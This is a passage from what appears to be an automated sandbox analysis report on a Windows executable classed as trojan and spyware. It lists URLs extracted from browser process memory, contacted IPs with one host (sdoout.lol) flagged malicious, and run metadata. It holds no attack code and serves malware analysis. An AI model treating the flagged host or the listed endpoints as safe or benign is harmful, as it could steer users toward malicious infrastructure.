                                                                            https://issuetracker.google.com/284462263msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://google-ohttp-relay-join.fastly-edge.com/:chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://google-ohttp-relay-join.fastly-edge.com/9chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://deff.nelreports.net/api/report?cat=msnReporting and NEL.24.drfalse
                                                                                    high
                                                                                    https://ntp.msn.cn/edge/ntp2cc80dabc69f58b6_1.23.drfalse
                                                                                      high
                                                                                      https://google-ohttp-relay-join.fastly-edge.com/=chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://deff.nelreports.net/api/reportReporting and NEL.24.drfalse
                                                                                          high
                                                                                          https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://polymer.github.io/AUTHORS.txtchrome.exe, 00000011.00000003.2791630004.00002598010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793160754.0000259800F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791789034.0000259800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791755703.0000259801114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791725682.00002598010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791843371.00002598010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793563199.0000259800FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793252186.0000259800AD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://docs.google.com/chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drfalse
                                                                                                high
                                                                                                https://docs.google.com/document/:chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.youtube.com4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drfalse
                                                                                                      high
                                                                                                      https://deff.nelreports.net/api/report?cat=msnwReporting and NEL.24.drfalse
                                                                                                        high
                                                                                                        https://anglebug.com/7714chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.instagram.com4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drfalse
                                                                                                            high
                                                                                                            https://msn.comXIDv100oCookies.24.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://drive.google.com/?lfhs=2chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://anglebug.com/6248chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drfalse
                                                                                                                      high
                                                                                                                      https://outlook.office.com/mail/compose?isExtension=true4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drfalse
                                                                                                                        high
                                                                                                                        http://anglebug.com/6929chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://anglebug.com/5281chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://i.y.qq.com/n2/m/index.html4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drfalse
                                                                                                                              high
                                                                                                                              https://www.deezer.com/4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drfalse
                                                                                                                                high
                                                                                                                                https://www.youtube.com/?feature=ytcachrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://issuetracker.google.com/255411748chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://web.telegram.org/4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drfalse
                                                                                                                                      high
                                                                                                                                      https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://anglebug.com/7246chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://anglebug.com/7369chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://anglebug.com/7489chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://duckduckgo.com/?q=chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://chrome.google.com/webstorechrome.exe, 00000011.00000003.2787695410.0000259800CC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2987641130.000002E40016C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://cdnjs.cloudflare.com/ajax/libs/mathjax/service_worker_bin_prod.js.23.dr, offscreendocument_main.js.23.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://drive-daily-2.corp.google.com/chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://polymer.github.io/PATENTS.txtchrome.exe, 00000011.00000003.2791630004.00002598010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793160754.0000259800F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791789034.0000259800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791755703.0000259801114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791725682.00002598010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791843371.00002598010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793563199.0000259800FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793252186.0000259800AD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.autoitscript.com/autoit3/XEvans.com, 0000000D.00000000.2217338938.0000000000B95000.00000002.00000001.01000000.00000007.sdmp, Evans.com.2.dr, Entities.9.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://issuetracker.google.com/161903006chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.ecosia.org/newtab/lxlxt0.13.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://drive-daily-1.corp.google.com/chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://excel.new?from=EdgeM365Shoreline4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://drive-daily-5.corp.google.com/chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://duckduckgo.com/favicon.icochrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://plus.google.comchromecache_473.19.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://anglebug.com/3078chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://anglebug.com/7553chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://anglebug.com/5375chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.24.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.youtube.com/s/notifications/manifest/cr_install.htmlltchrome.exe, 00000011.00000003.2819894241.000025980129C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://anglebug.com/5371chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://anglebug.com/4722chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://anglebug.com/7556chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refaieukn.13.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://chromewebstore.google.com/msedge.exe, 00000015.00000002.2987641130.000002E40016C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.23.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://drive-preprod.corp.google.com/chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://srtb.msn.cn/2cc80dabc69f58b6_1.23.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477aieukn.13.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://chrome.google.com/webstore/manifest.json.23.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.23.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://google-ohttp-relay-join.fastly-edge.com/&chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/%chrome.exe, 00000011.00000003.2822696005.0000259801954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://browser.events.data.msn.com/2cc80dabc69f58b6_1.23.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000015.00000003.2908721230.000002E40026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908564343.000002E400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2908925216.000002E400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://anglebug.com/6692chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://issuetracker.google.com/258207403chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://anglebug.com/3502chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              http://anglebug.com/3623chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://www.office.com4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  http://anglebug.com/3625chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://outlook.live.com/mail/0/4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      http://anglebug.com/3624chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://docs.google.com/presentation/Jchrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          http://anglebug.com/5007chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                              23.44.201.17
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                              162.159.61.3
                                                                                                                                                                                                                                              chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              108.139.47.92
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                              20.110.205.119
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                              18.244.18.38
                                                                                                                                                                                                                                              sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                              216.58.206.46
                                                                                                                                                                                                                                              plus.l.google.comUnited States
                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                                                                              unknownReserved
                                                                                                                                                                                                                                              unknownunknownfalse
                                                                                                                                                                                                                                              142.250.186.46
                                                                                                                                                                                                                                              play.google.comUnited States
                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                              116.203.14.4
                                                                                                                                                                                                                                              sdoout.lolGermany
                                                                                                                                                                                                                                              24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                              149.154.167.99
                                                                                                                                                                                                                                              t.meUnited Kingdom
                                                                                                                                                                                                                                              62041TELEGRAMRUfalse
                                                                                                                                                                                                                                              13.69.239.77
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                              204.79.197.219
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                              172.64.41.3
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              23.44.201.43
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                              23.209.72.8
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                              172.217.16.129
                                                                                                                                                                                                                                              googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                              142.250.186.164
                                                                                                                                                                                                                                              www.google.comUnited States
                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                                              192.168.2.5
                                                                                                                                                                                                                                              127.0.0.1
                                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                              Analysis ID:1582695
                                                                                                                                                                                                                                              Start date and time:2024-12-31 09:44:07 +01:00
                                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                              Overall analysis duration:0h 8m 2s
                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                              Number of analysed new started processes analysed:33
                                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                              Sample name:6684V5n83w.exe
                                                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                                                              Original Sample Name:53c60d599aa498ed4efa79ba0b12e29f.exe
                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@91/294@29/19
                                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                                              • Number of executed functions: 37
                                                                                                                                                                                                                                              • Number of non-executed functions: 36
                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 192.229.221.95, 199.232.214.172, 172.217.18.99, 142.250.185.174, 74.125.133.84, 142.250.181.238, 142.250.185.78, 142.250.186.67, 142.250.186.78, 142.250.184.202, 216.58.212.138, 172.217.18.106, 216.58.206.42, 142.250.181.234, 142.250.185.74, 216.58.206.74, 142.250.186.170, 142.250.185.106, 142.250.185.202, 142.250.186.74, 142.250.185.138, 142.250.185.234, 142.250.185.170, 216.58.212.170, 142.250.184.234, 142.250.74.202, 172.217.18.10, 172.217.23.106, 142.250.186.138, 142.250.186.42, 142.250.186.106, 172.217.16.202, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 142.250.185.110, 13.107.6.158, 2.16.168.107, 2.16.168.113, 4.231.68.226, 88.221.110.179, 88.221.110.195, 2.23.209.165, 2.23.209.130, 2.23.209.177, 2.23.209.148, 2.23.209.150, 2.23.209.140, 2.23.209.179, 2.23.209.133, 2.23.209.176, 2.23.209.185, 2.23.209.189, 2.23.209.182, 204.79.197.237, 13.107.21.237, 13.74.129.1, 2.23.209.52, 2.23.209.8, 2.23.209.48, 2.23.209.45, 2.23.209.55, 2.23.209.59, 2.23.2
